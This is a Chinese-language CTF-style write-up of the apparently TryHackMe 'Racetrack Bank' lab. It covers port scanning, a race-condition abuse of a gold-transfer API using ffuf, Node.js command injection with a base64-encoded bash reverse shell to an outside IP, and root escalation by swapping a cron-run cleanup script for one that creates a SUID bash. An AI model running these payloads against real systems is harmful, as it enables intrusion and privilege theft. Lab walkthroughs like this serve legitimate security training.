打靶记录(七十)之THMRacetrackBank

端口扫描

nmap --min-rate=10000 -p- 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:42 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.0030s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:38:DE:53:EB:89 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

nmap -sT -sV -sC -O -p22,80 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:43 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 519153a5af1a5a786762aed637a08e33 (RSA)
|   256 c17072cc82c3f33e5e0a6a054ef04c3c (ECDSA)
|_  256 a2ea537ce1d760bcd39208a99d206b7d (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Racetrack Bank
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 02:38:DE:53:EB:89 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds

nmap --script=vuln -p22,80 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:43 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.00027s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-enum: 
|_  /login.html: Possible admin folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-148-95.eu-west-1.compute.internal
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://ip-10-10-148-95.eu-west-1.compute.internal:80/create.html
|     Form id: uname
|     Form action: /api/create
|     
|     Path: http://ip-10-10-148-95.eu-west-1.compute.internal:80/login.html
|     Form id: uname
|_    Form action: /api/login
MAC Address: 02:38:DE:53:EB:89 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 73.23 seconds

Getshell

发现是一个Express框架。先注册一个mikannse账号进去看看，发现给了我们一个金条，然后我们可以用一万个金条买一个超级用户。然后我们还可以赠送别人金条，也许我们可以多创建几个账号来互相赠送金条。再创建一个mikannse1账号赠送给我们第一个创建的账号

POST /api/givegold HTTP/1.1
Host: 10.10.148.95
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://10.10.148.95
Connection: close
Referer: http://10.10.148.95/giving.html
Cookie: connect.sid=s%3AFjCRuvQNkwxKBVpNzz9SEFIRAjKkhIyk.b1AWs0M9aSWPThhqOxAjP60uprQltWpVsb5RYzHtTXI
Upgrade-Insecure-Requests: 1

user=mikannse&amount=1

发现是调用了givegold这个api。然后就赠送成功了

似乎存在条件竞争，试着将mikannse中的金条再赠送给mikannse1，但是这次我们用fuzz来批量赠送。

我们先创建一个list.txt，里面放上10个1,像这样

1

1

1

.

.

ffuf -u http://10.10.148.95/api/givegold -X POST -w list.txt -H "Content-Type: application/x-www-form-urlencoded" -b "connect.sid=s%3Aw7_6OmRfjF3e3Vix3kRded1Gm4BfVn7p.uC193ipwKW9dYxKt9OGWuME8OY66qMRsYgEuV37TdKw" -d "user=mikannse1&amount=FUZZ"

然后发现mikannse1的账户上有了3个金条!

接下来扩展字典开始刷金条(怎么有一种刷Q币的感觉)

我直接写了四万多行，然后开始刷，但是有时候出现79长度的响应代表刷失败了，总之两个号之间相互刷一下都可以成功，我这里刷了好久无语。

然后直接购买VIP，发现可以计算，因为是express框架，和之间一个房间一样，可以nodejs命令执行:

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS4zOC4yNDUvMTIzNCAwPiYx | base64 -d | bash').toString();

base64写一个反弹shell

然后做个持久化生成个sshkey然后用key来ssh连接brian用户

提权

发现admin目录下有一个SUID，可以对.account文件进行更改查看什么的，但是似乎没什么用，IDA反编译也没发现什么可以利用的东西。也许只是一个兔子洞,但是还有一个root身份的cleanupscript.sh，虽然brian对这个文件不可写。但是因为这个文件在brian的家目录，所以我们有更改文件名的权限。当我创建了一个testfile.txt，一会儿之后这个文件被删了，也就是说有计划任务，那就拷贝一个SUIDbash

mv cleanupscript.sh cleanupscript.sh.bak

echo 'cp /bin/bash /home/brian/bash ;chmod +s /home/brian/bash;chmod +x /home/brian/bash' >cleanupscript.sh

碎碎念

getshell和提权还挺简单的，条件竞争要了解一下。算不上hard难度的房间吧。